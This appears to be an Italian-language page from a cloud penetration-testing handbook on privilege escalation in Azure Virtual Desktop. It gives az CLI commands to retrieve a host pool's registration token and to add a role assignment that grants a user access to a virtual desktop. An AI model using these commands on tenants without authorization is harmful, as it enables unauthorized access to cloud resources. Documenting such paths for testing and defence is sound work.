# Az - Virtual Desktop Privesx

{{#include ../../../banners/hacktricks-training.md}}

## Azure Virtual Desktop Privesc

Per ulteriori informazioni su Azure Virtual Desktop controlla:

{{#ref}}
../az-services/az-virtual-desktop.md
{{#endref}}


### `Microsoft.DesktopVirtualization/hostPools/retrieveRegistrationToken/action`
Puoi recuperare il token di registrazione utilizzato per registrare le macchine virtuali all'interno di un pool di host.
```bash
az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g Resource_Group_1
```
### Microsoft.Authorization/roleAssignments/read, Microsoft.Authorization/roleAssignments/write

> [!WARNING]
> Un attaccante con questi permessi potrebbe fare cose molto più pericolose di questa.

Con questi permessi puoi aggiungere un'assegnazione utente al gruppo Applicazione, che è necessaria per accedere alla macchina virtuale del desktop virtuale:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments/<NEW_ROLE_ASSIGNMENT_GUID>?api-version=2022-04-01" \
--body '{
"properties": {
"roleDefinitionId": "/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Authorization/roleDefinitions/1d18fff3-a72a-46b5-b4a9-0b38a3cd7e63",
"principalId": "<USER_OBJECT_ID>"
}
}'
```
Nota che affinché un utente possa accedere a un Desktop o a un'app, ha anche bisogno del ruolo `Virtual Machine User Login` o `Virtual Machine Administrator Login` sulla VM.


{{#include ../../../banners/hacktricks-training.md}}
